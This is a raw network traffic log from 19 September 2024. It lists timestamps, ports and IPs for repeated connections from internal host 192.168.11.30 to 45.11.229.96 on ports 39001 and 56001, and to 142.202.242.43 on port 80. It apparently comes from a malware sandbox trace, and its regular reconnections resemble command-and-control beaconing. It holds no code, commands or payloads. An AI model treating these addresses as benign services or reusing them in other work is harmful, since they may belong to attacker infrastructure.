Sep 19, 2024 02:43:20.949330091 CEST	49901	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:21.144764900 CEST	39001	49901	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:21.146172047 CEST	49901	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:21.146331072 CEST	49901	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:21.255620003 CEST	49902	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:21.325401068 CEST	39001	49901	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:21.450304031 CEST	39001	49902	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:21.451690912 CEST	49902	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:22.513170958 CEST	49902	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:22.735507965 CEST	39001	49902	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:22.736438990 CEST	49902	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:22.824310064 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:43:22.916929960 CEST	39001	49902	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:22.918241024 CEST	49902	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:22.918466091 CEST	49902	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:22.994817019 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:43:23.036386967 CEST	49903	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:23.097071886 CEST	39001	49902	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:23.129137039 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:43:23.222440004 CEST	39001	49903	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:23.223746061 CEST	49903	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:24.250049114 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:24.288275957 CEST	49903	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:24.483238935 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:24.484559059 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:24.531851053 CEST	39001	49903	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:24.532860041 CEST	49903	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:24.688855886 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:24.718281984 CEST	39001	49903	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:24.719269037 CEST	49903	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:24.719465971 CEST	49903	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:24.832918882 CEST	49904	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:24.894334078 CEST	39001	49903	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:24.925595045 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:25.032654047 CEST	39001	49904	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:25.032687902 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:25.033746958 CEST	49904	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:25.033746958 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:25.038661003 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:25.100929022 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:25.102323055 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:25.273564100 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:25.274589062 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:25.498851061 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:26.099905968 CEST	49904	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:26.326963902 CEST	39001	49904	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:26.328114033 CEST	49904	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:26.517503023 CEST	39001	49904	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:26.518656015 CEST	49904	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:26.518825054 CEST	49904	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:26.629379034 CEST	49905	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:26.696576118 CEST	39001	49904	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:26.807750940 CEST	39001	49905	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:26.809096098 CEST	49905	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:27.880397081 CEST	49905	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:28.124089956 CEST	39001	49905	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:28.124985933 CEST	49905	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:28.331708908 CEST	39001	49905	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:28.332937956 CEST	49905	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:28.333137035 CEST	49905	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:28.441505909 CEST	49906	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:28.508724928 CEST	39001	49905	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:28.616413116 CEST	39001	49906	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:28.617501974 CEST	49906	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:28.995136976 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:43:29.167589903 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:43:29.237118959 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:43:29.692886114 CEST	49906	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:30.014472008 CEST	39001	49906	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:30.015444040 CEST	49906	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:30.195547104 CEST	39001	49906	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:30.196935892 CEST	49906	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:30.197153091 CEST	49906	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:30.316085100 CEST	49907	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:30.372880936 CEST	39001	49906	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:30.493206024 CEST	39001	49907	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:30.494172096 CEST	49907	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:31.555810928 CEST	49907	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:31.826632977 CEST	39001	49907	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:31.827723026 CEST	49907	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:32.010348082 CEST	39001	49907	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:32.011574030 CEST	49907	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:32.011789083 CEST	49907	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:32.128168106 CEST	49908	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:32.191730022 CEST	39001	49907	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:32.303901911 CEST	39001	49908	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:32.305282116 CEST	49908	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:33.383598089 CEST	49908	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:33.634223938 CEST	39001	49908	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:33.635159016 CEST	49908	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:33.818756104 CEST	39001	49908	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:33.818916082 CEST	49908	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:33.819111109 CEST	49908	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:33.940224886 CEST	49909	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:33.994108915 CEST	39001	49908	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:34.117126942 CEST	39001	49909	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:34.117429018 CEST	49909	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:35.193108082 CEST	49909	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:35.514422894 CEST	39001	49909	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:35.515717030 CEST	49909	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:35.711673021 CEST	39001	49909	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:35.713006020 CEST	49909	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:35.713251114 CEST	49909	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:35.830617905 CEST	49910	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:35.889775038 CEST	39001	49909	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:36.005708933 CEST	39001	49910	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:36.005923986 CEST	49910	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:36.843031883 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:43:37.019314051 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:43:37.072844982 CEST	49910	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:37.141552925 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:43:37.312047958 CEST	39001	49910	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:37.312387943 CEST	49910	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:37.500303030 CEST	39001	49910	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:37.501444101 CEST	49910	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:37.501641035 CEST	49910	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:37.611216068 CEST	49911	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:37.685280085 CEST	39001	49910	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:37.813388109 CEST	39001	49911	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:37.814286947 CEST	49911	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:38.878137112 CEST	49911	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:39.110416889 CEST	39001	49911	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:39.111685038 CEST	49911	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:39.299557924 CEST	39001	49911	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:39.300678968 CEST	49911	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:39.300879955 CEST	49911	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:39.423609972 CEST	49912	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:39.478699923 CEST	39001	49911	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:39.597780943 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:43:39.599868059 CEST	39001	49912	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:39.601258039 CEST	49912	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:39.641000986 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:43:40.672008038 CEST	49912	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:41.014419079 CEST	39001	49912	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:41.015398026 CEST	49912	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:41.199246883 CEST	39001	49912	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:41.199456930 CEST	49912	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:41.199649096 CEST	49912	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:41.314016104 CEST	49913	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:41.388804913 CEST	39001	49912	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:41.492527008 CEST	39001	49913	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:41.492832899 CEST	49913	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:42.567728043 CEST	49913	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:42.795274019 CEST	39001	49913	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:42.795455933 CEST	49913	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:42.979139090 CEST	39001	49913	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:42.980324030 CEST	49913	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:42.980470896 CEST	49913	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:43.094474077 CEST	49914	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:43.157200098 CEST	39001	49913	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:43.270631075 CEST	39001	49914	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:43.270869017 CEST	49914	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:44.331140041 CEST	49914	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:44.624015093 CEST	39001	49914	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:44.625108004 CEST	49914	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:44.811389923 CEST	39001	49914	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:44.812680960 CEST	49914	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:44.812915087 CEST	49914	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:44.937691927 CEST	49915	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:44.990036011 CEST	39001	49914	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:45.116674900 CEST	39001	49915	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:45.118246078 CEST	49915	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:46.207359076 CEST	49915	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:46.436798096 CEST	39001	49915	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:46.437975883 CEST	49915	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:46.620456934 CEST	39001	49915	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:46.621792078 CEST	49915	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:46.621988058 CEST	49915	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:46.734174967 CEST	49916	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:46.798682928 CEST	39001	49915	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:46.910916090 CEST	39001	49916	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:46.912213087 CEST	49916	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:47.987231970 CEST	49916	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:48.217839003 CEST	39001	49916	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:48.219173908 CEST	49916	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:48.427484035 CEST	39001	49916	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:48.428731918 CEST	49916	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:48.428914070 CEST	49916	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:48.546210051 CEST	49918	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:48.609488010 CEST	39001	49916	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:48.721951008 CEST	39001	49918	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:48.722979069 CEST	49918	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:49.785490036 CEST	49918	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:50.014503956 CEST	39001	49918	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:50.015805960 CEST	49918	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:50.198189974 CEST	39001	49918	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:50.199266911 CEST	49918	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:50.199400902 CEST	49918	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:50.261362076 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:50.311440945 CEST	49919	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:50.374838114 CEST	39001	49918	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:50.487458944 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:50.488838911 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:50.493525028 CEST	39001	49919	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:50.494838953 CEST	49919	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:50.673485041 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:50.825959921 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:50.984770060 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:50.985986948 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:50.988257885 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:51.001276970 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:51.002657890 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:51.232845068 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:51.233855009 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:51.455352068 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:51.568960905 CEST	49919	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:51.826251984 CEST	39001	49919	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:51.827406883 CEST	49919	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:52.045433044 CEST	39001	49919	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:52.046225071 CEST	49919	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:52.046418905 CEST	49919	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:52.154854059 CEST	49920	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:52.221226931 CEST	39001	49919	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:52.331120968 CEST	39001	49920	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:52.332385063 CEST	49920	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:53.393735886 CEST	49920	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:53.624728918 CEST	39001	49920	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:53.626369953 CEST	49920	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:53.839236975 CEST	39001	49920	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:53.840332985 CEST	49920	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:53.840626955 CEST	49920	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:53.967012882 CEST	49921	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:54.029967070 CEST	39001	49920	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:54.142602921 CEST	39001	49921	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:54.143939018 CEST	49921	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:55.223756075 CEST	49921	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:55.513706923 CEST	39001	49921	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:55.513869047 CEST	49921	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:55.712682962 CEST	39001	49921	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:55.712835073 CEST	49921	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:55.713002920 CEST	49921	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:55.825994015 CEST	49922	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:55.888673067 CEST	39001	49921	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:56.007397890 CEST	39001	49922	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:56.007615089 CEST	49922	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:57.116157055 CEST	49922	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:57.514287949 CEST	39001	49922	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:57.514446020 CEST	49922	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:57.700448036 CEST	39001	49922	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:57.700686932 CEST	49922	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:57.700920105 CEST	49922	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:57.825552940 CEST	49923	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:57.880866051 CEST	39001	49922	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:58.002516031 CEST	39001	49923	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:58.002732992 CEST	49923	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:59.139925957 CEST	49923	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:59.530576944 CEST	39001	49923	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:59.530776024 CEST	49923	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:59.737776995 CEST	39001	49923	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:59.737950087 CEST	49923	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:59.738105059 CEST	49923	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:59.856136084 CEST	49924	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:59.914746046 CEST	39001	49923	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:00.037587881 CEST	39001	49924	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:00.037731886 CEST	49924	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:01.088617086 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:44:01.145692110 CEST	49924	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:01.229852915 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:01.420023918 CEST	39001	49924	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:01.420178890 CEST	49924	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:01.609983921 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:44:01.663274050 CEST	39001	49924	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:01.663438082 CEST	49924	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:01.663619041 CEST	49924	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:01.729752064 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:44:01.778203964 CEST	49925	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:01.838928938 CEST	39001	49924	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:01.953046083 CEST	39001	49925	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:01.953290939 CEST	49925	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:02.308249950 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:02.529689074 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:02.529824972 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:02.717248917 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:02.823199987 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:02.996258974 CEST	49925	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:02.997921944 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:03.000247955 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:03.217031956 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:03.217200041 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:03.315795898 CEST	39001	49925	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:03.315922976 CEST	49925	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:03.452368975 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:03.532150030 CEST	39001	49925	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:03.532363892 CEST	49925	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:03.532557964 CEST	49925	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:03.652276993 CEST	49926	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:03.710339069 CEST	39001	49925	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:03.827385902 CEST	39001	49926	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:03.827554941 CEST	49926	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:04.280284882 CEST	49926	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:04.625525951 CEST	39001	49926	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:04.625732899 CEST	49926	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:05.014096022 CEST	39001	49926	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:05.014309883 CEST	49926	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:05.197453022 CEST	39001	49926	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:05.197637081 CEST	49926	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:05.197792053 CEST	49926	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:05.323920012 CEST	49927	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:05.373246908 CEST	39001	49926	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:05.504194021 CEST	39001	49927	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:05.504481077 CEST	49927	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:06.630641937 CEST	49927	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:07.013631105 CEST	39001	49927	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:07.013813019 CEST	49927	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:07.232985020 CEST	39001	49927	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:07.233227015 CEST	49927	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:07.233407974 CEST	49927	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:07.354609966 CEST	49928	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:07.410798073 CEST	39001	49927	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:07.531697035 CEST	39001	49928	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:07.531997919 CEST	49928	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:08.640785933 CEST	49928	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:09.014736891 CEST	39001	49928	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:09.015008926 CEST	49928	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:09.202153921 CEST	39001	49928	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:09.202394962 CEST	49928	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:09.202629089 CEST	49928	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:09.322987080 CEST	49929	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:09.378149033 CEST	39001	49928	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:09.497829914 CEST	39001	49929	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:09.498086929 CEST	49929	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:10.627386093 CEST	49929	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:11.014138937 CEST	39001	49929	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:11.014309883 CEST	49929	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:44:11.270241976 CEST	39001	49929	45.11.229.96	192.168.11.30
Sep 19, 2024 02:44:11.270394087 CEST	49929	39001	192.168.11.30	45.11.229.96
